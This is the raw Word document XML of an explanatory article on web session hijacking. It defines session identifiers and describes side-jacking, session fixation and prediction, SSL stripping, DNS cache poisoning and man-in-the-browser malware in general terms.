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99EA"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Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Session hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA07189" w14:textId="0551F2ED" w:rsidR="00C67B4C" w:rsidRPr="00C67B4C" w:rsidRDefault="00C67B4C" w:rsidP="00C67B4C">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65460CA2" wp14:editId="25B0A90C">
            <wp:extent cx="5731510" cy="732790"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="179675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p w14:paraId="7F307234"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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>What is session hijacking?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009A2224" w14:textId="72AD191F"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In a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>session hijacking</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> attack, the attacker steals the session IDs for a web application by eavesdropping on the communication between a user and an application or by gaining access to the user’s computer or web browser data. Attackers can perform session hijacking using techniques that include exploiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> cross-site scripting (XSS)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> vulnerabilities, performing</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> man-in-the-middle (MITM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> attacks, or planting malware such as trojans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C6C43"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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>How do session identifiers work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41720E1F"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i/>
          <w:iCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Session identifiers</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> (SIDs), sometimes called </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>session keys</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>session tokens</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, are character strings used to authenticate users in web applications. These strings are generated by the application after the user successfully logs in, presented to the user’s browser, and used across different web pages or functions of the application, usually via a session cookie. Since the web browser shares the session cookie with the application in every HTTP request, the application can use the session identifier to recognize a known user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F94A10D" w14:textId="093E319B"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If it weren’t for session identifiers, we would have to log in to web applications much more frequently than we do. However, a session identifier has the same weakness as a password: it is only secure while it is secret. As soon as a malicious user knows your session ID, they can get access to your account and use it for further attacks and potential</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> privilege escalation</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F35388"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2"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>What attacks are related to session identifiers?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D839C8"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In general, malicious hackers will try to get access to session identifiers to impersonate users and gain access to their accounts/privileges. There are several specific attack techniques targeting sessions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2DA266" w14:textId="77777777" w:rsidR="00C67B4C" w:rsidRPr="00C67B4C" w:rsidRDefault="00C67B4C" w:rsidP="00C67B4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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i/>
          <w:iCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Session hijacking</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> is all about getting an existing session ID from a logged-in user, for example, performing man-in-the-middle (MITM) attacks to infiltrate communication between the victim’s browser and the web server or exploiting XSS vulnerabilities to access cookies in the victim’s browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BBD687" w14:textId="0A52E112" w:rsidR="00C67B4C" w:rsidRPr="00C67B4C" w:rsidRDefault="00C67B4C" w:rsidP="00C67B4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Session fixation</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> uses a different approach to obtain a valid ID. The attacker generates a session ID (or has one generated by the web application) and tricks the victim into logging in using this identifier, allowing the attacker to take over the user’s session later.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3821F114" w14:textId="634F5E3E" w:rsidR="00C67B4C" w:rsidRPr="00C67B4C" w:rsidRDefault="00C67B4C" w:rsidP="00C67B4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Session prediction</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> exploits weaknesses in the way session IDs are generated. If the process is not fully random and the attacker figures out the algorithm, they can generate valid session IDs. If session identifiers are short, attackers could even use brute force attacks to guess a valid identifier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092A65A9"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Note that </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>session hijacking</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> is often used as an umbrella term for all attacks that lead to malicious hackers getting access to valid session IDs. In that sense, session fixation and session prediction may be considered sub-types of session hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8AAC42" w14:textId="739B70C2"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Some sources also use the term </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>session hijacking</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> for a completely different cybersecurity topic – TCP session hijacking, which has nothing to do with web application session hijacking. Hijacking TCP/IP sessions is closely related to</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> IP address spoofing</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> – the attacker is trying to take over the existing TCP/IP session between the user and the server, not the web session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FF2BBA"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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>How does session hijacking work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3D70E8"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There are three main approaches to session hijacking: eavesdropping on user communication, gaining access to the user’s computer, and gaining access to the user’s browser data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C217BAD"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2"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Eavesdropping on communications – session side-jacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B927E62"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Session hijacking techniques that rely on MITM attack techniques are called </w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E5E5" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>session side-jacking</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> attacks. In the simplest case, when traffic is not encrypted, you only need a simple sniffer working in the same local network as the client to monitor network traffic for user connections and perform packet sniffing. This is especially common for public Wi-Fi networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E07239C"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If a website or web application uses exclusively encrypted connections, simple session sniffing won’t do, but there are other tricks that may be attempted. Some examples include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EDDF61" w14:textId="77777777" w:rsidR="00C67B4C" w:rsidRPr="00C67B4C" w:rsidRDefault="00C67B4C" w:rsidP="00C67B4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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hyperlink r:id="rId6"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SSL stripping</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> – the attacker tricks the web application into dropping an HTTPS connection and using the insecure HTTP protocol instead, which makes packet sniffing possible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9F5F8F" w14:textId="77777777" w:rsidR="00C67B4C" w:rsidRPr="00C67B4C" w:rsidRDefault="00C67B4C" w:rsidP="00C67B4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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hyperlink r:id="rId7"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SSL hijacking</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> – the attacker generates a fake SSL certificate for the web application, and the victim connects to a cloned or proxy application controlled by the attacker without any certificate warnings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F21CA31" w14:textId="77777777" w:rsidR="00C67B4C" w:rsidRPr="00C67B4C" w:rsidRDefault="00C67B4C" w:rsidP="00C67B4C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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hyperlink r:id="rId8"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DNS cache poisoning</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> – the attacker tricks the victim’s DNS cache into storing manipulated domain information, and the victim’s browser is directed to a cloned or proxy application controlled by the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E567A17"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Most session side-jacking attacks focus on stealing session cookies as the most common vehicle for session IDs. However, these methods are not limited to </w:t>
      </w:r>
      <w:hyperlink r:id="rId9"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cookie hijacking</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, and many can be applied equally well to session tokens sent in other parts of HTTP requests, such as custom request headers or the request body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76969859"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2"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Gaining computer access through malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5F7FED"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lastRenderedPageBreak/>
        <w:t>In many cases, attackers attempt to infect user computer systems with malware such as trojans for the purpose of gaining session information. A well-known example of this is the</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="_blank"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 man-in-the-browser</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C67B4C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="101820"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t> attack, where session identifiers are stolen directly from the user’s web browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBB68AA"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2"/>
        <w:rPr>
